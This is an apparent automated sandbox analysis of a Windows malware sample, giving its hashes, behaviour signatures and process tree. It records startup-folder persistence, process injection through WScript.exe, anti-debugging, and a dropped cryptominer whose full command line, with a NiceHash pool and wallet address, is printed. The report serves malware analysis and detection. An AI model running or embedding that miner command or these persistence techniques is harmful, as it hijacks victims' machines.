Analysis
max time kernel: 150s
max time network: 122s
platform: windows7_x64
resource: win7-20240221-en
resource tags: arch:x64 arch:x86 image:win7-20240221-en locale:en-us os:windows7-x64 system
submitted: 20-05-2024 15:54
Static task: static1
Behavioral task: behavioral1
  Sample: 5feee9c9673462dfceb2df85cf8138b5_JaffaCakes118.exe
  Resource: win7-20240221-en
Behavioral task: behavioral2
  Sample: 5feee9c9673462dfceb2df85cf8138b5_JaffaCakes118.exe
  Resource: win10v2004-20240426-en
General
Target: 5feee9c9673462dfceb2df85cf8138b5_JaffaCakes118.exe
Size: 1.6MB
MD5: 5feee9c9673462dfceb2df85cf8138b5
SHA1: 18a97e4d1ba48aa7e935e4d0ebf415d7db859c1d
SHA256: c8fe094489bbbe929b676647dea128e9ef251d7babe7b6b67ee98d503eb33174
SHA512: 9f1d6f0bf328fcc930d24dcc9c291b1ca13ef5d742fa0e0f622bfd6890c7da183ee35508e3f4a9b4ddfcbebdeb1e2960d49b00b6a14f28b8198b6e23e5baef1e
SSDEEP: 49152:Al6wBw10h/e9uUdu7XUIvoMoSzxWTnHGQvPM/9Dft:AlD9WuvtY7pHMD
Malware Config
Signatures
- Drops startup file (1 IoC)
  File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk, by process 5feee9c9673462dfceb2df85cf8138b5_JaffaCakes118.exe
- Executes dropped EXE (45 IoCs): csrs.exe
- Loads dropped DLL (45 IoCs): WScript.exe (PID 2476)
- VMProtect (yara rule: vmprotect), matched on the dropped file behavioral1/files/0x0007000000014358-9.dat and on memory dumps of WScript.exe (PID 2476) and the csrs.exe processes
- Suspicious use of NtSetInformationThreadHideFromDebugger (44 IoCs): csrs.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious use of WriteProcessMemory (64 IoCs)
  The sample (PID 2992) wrote to the memory of WScript.exe (PID 2476), which in turn wrote to the memory of the csrs.exe children it spawned.
Processes
- C:\Users\Admin\AppData\Local\Temp\5feee9c9673462dfceb2df85cf8138b5_JaffaCakes118.exe (depth 1, PID 2992)
  command line: "C:\Users\Admin\AppData\Local\Temp\5feee9c9673462dfceb2df85cf8138b5_JaffaCakes118.exe"
  - Drops startup file
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WScript.exe (depth 2, PID 2476)
    command line: "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\svchost.VBS"
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    - C:\ProgramData\Windows\csrs.exe (depth 3, PID 2512; first of 45 csrs.exe children with the same command line)
      command line: "C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 15
      - Executes dropped EXE
      - Suspicious use of NtSetInformationThreadHideFromDebugger
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 1.4MB
  MD5: e3427d9f439aebefa3d9c299e2a94af3
  SHA1: ffff4672790378677ec30d3634fc593c10dfd37e
  SHA256: 7374051e75ae97ba687cd153927faccd21fcdcc0b41a42867d38ac62064f6aba
  SHA512: a9ffc1a3436a26b162b8933f628b6f5014b7cd5678625a479ddf6ad0ff32a50b916c2041265fa0fc6cc99fcf0c63e30eb4811cf8099cc0baf2b718647ce4160b
- Filesize: 1KB
  MD5: f4b667fe8d75278dffe4fa57d5b7212c
  SHA1: 05bc96683ea77d081fedcd810c4de7e9c5bb833a
  SHA256: 4f1a7ce0e5031763d94e774ce4fbe096e9ad0058abb5d209988dbf375a5ec922
  SHA512: 52e2113bf234ea03c933d57030326e850847558ad7b195f74a99fa0d23e9857cb0e273a52a45602663462ee0bd9fee017e76e67b5a68c748e286b36d60ba6d41